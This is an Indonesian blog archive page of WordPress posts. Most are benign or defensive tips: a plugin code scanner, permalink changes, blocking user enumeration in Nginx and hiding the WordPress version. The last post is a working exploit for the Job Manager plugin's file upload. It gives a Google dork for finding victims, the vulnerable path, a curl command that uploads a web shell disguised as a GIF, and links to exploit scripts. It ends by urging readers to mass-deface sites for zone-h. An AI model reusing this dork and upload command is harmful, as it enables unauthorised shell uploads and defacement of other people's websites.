Codes Xploit: wordpress
Showing posts with label wordpress. Show all posts
Showing posts with label wordpress. Show all posts

Scan Source Code Plugin WordPress dengan WPSploit

Scan Kode Plugin WordPress dengan WPSploit - Kali ini saya bakal sharing tips seputar WordPress. WPSploit adalah tools yang ditulis dengan bahasa python dan difungsikan untuk melakukan scanning terhadap source code plugins WordPress. Tujuannya tentu saja untuk mengaudit sumber kode tersebut untuk menghindari kode yang memiliki celah.
Read More

Cara Menghilangkan Permalink /blog/ Pada Wordpress

Halo teman teman kembali lagi bersama saya, kali ini saya akan memberikan tuturial cara menghilangkan permalink /blog/ pada website bawaan yang baru di install wordpress, permalink tersebut sudah ada sejak teman teman menginstall wordpress, nah teman teman pasti banyak yang ingin tau bagaimana sih cara menghilangkan permalink bawaan wordpress tersebut agar link website kita lebih pendek dan lebih enak ketika di lihat orang.
nah sekarang langsung saja saya akan memberikan bagai mana sih caranya menghilangkan permalink bawaan dari wordpress tersebut.
Berikut cara untuk menghilangkan permalink bawaan pada wordpress :
  1. Pertama kita masuk ke dasbor wordpress website kita.
  2. Setelah masuk ke dasbor kita cek terlebih dahulu ke Pengaturan > Permalink, kita lihat terlebih dahuli permalink bawaannya masih /blog/%postname%/
  3. Oke sekarang kita langsung pergi ke Situs Milik Saya > Admin Jaringan > Situs
  4. Setelah itu pilih situs kalian dan klik Edit
  5. Lalu pilih Pengaturan
  6. kalian scroll kebawah dan cari Permalink Structure lalu di situ ada tulisan /blog/%postname%/ nah kalian ganti menjadi /%postname%/ lalu scroll lagi sampai bawah dan klik Simpan Perubahan

  7. Setelah itu kembali lagi ke Situs Milik Saya > nama domain anda > Dasbor
  8. Setelah masuk ke Dasbor masuk ke Pengaturan > Permalink, dan lihat permalinknya sudah terganti dari /blog/%postname%/ ke /%postname%/
Gimana mudah bukan? begitulah jika kita rajin menggali informasi pasti kita akan dapat dengan mudah memahaminya, sekian dulu dari saya mengenai Cara Menghilangkan Permalink /blog/ Pada Wordpress, semoga artikel saya kali ini dapat bermanfaat bagi anda semua, jika ada yang belum paham bisa di tanyakan di kolom komentar, Terimakasih.

Blokir WordPress User Enumeration dengan Nginx

Blokir WordPress User Enumeration dengan Nginx - Memblokir enumerasi username merupakan upaya untuk mencegah terjadinya peretasan di blog atau cms WordPress. Karena jika attacker berhasil mendapatkan daftar username di WordPress, kesempatan mereka untuk melakukan bruteforce semakin terbuka karena sudah mendapatkan daftar username pasti. Nah di kesempatan kali ini saya akan share cara block user enumeration dengan rule nginx, jadi bukan dengan plugins.
Read More

Mengubah Struktur Permalink WordPress di Nginx

Mengubah Struktur Permalink WordPress di Nginx - Sebenernya ini sekalian saya jadikan arsip atau cacatan pribadi soalnya tadi hampir sejam ngotak atik nginx rule biar permalink lawas di redirect ke permalink baru. Dan karena di Google gak ketemu tutorialnya (entah karena jarang atau saya yang salah keyword), akhirnya nyoba nyoba sendiri. Beruntuk akhirnya berhasil. ??
Read More

Cara Menyembunyikan Versi WordPress Yang Terinstall

Cara Menyembunyikan Versi WordPress Yang Terinstall - Menyembunyikan versi WordPress yang kita install merupakan langkah pencegahan jika sewaktu waktu versi WordPress yang kita install terdapat celah atau bug. Karena scanner seperti wpscan akan mengekspos seluruh celah yang ada jika situs kita menjadi target scan.
Read More

WordPress Plugin Job Manager File Upload

Exploit Title: WordPress Plugin Job Manager File Upload
Google Dork: inurl:/wp-content/uploads/job-manager-uploads/
Vuln Path: /jm-ajax/upload_file

Example:
www.target.com/jm-ajax/upload_file/
( Vuln Target )

Exploit:
1. CSRF

2. CURL POST
root # curl -k -F "file=@shell.gif" "http://target.com/jm-ajax/upload_file/"


Upload file anda dengan format .gif/.jpg/.png





Script:
https://pastebin.com/hp0jJr1g [PHP][CLI Based]
https://pastebin.com/FaACEDLg [BASH]


Ayo kawan kita boom zone-h sebelum dir upload di banned lagi.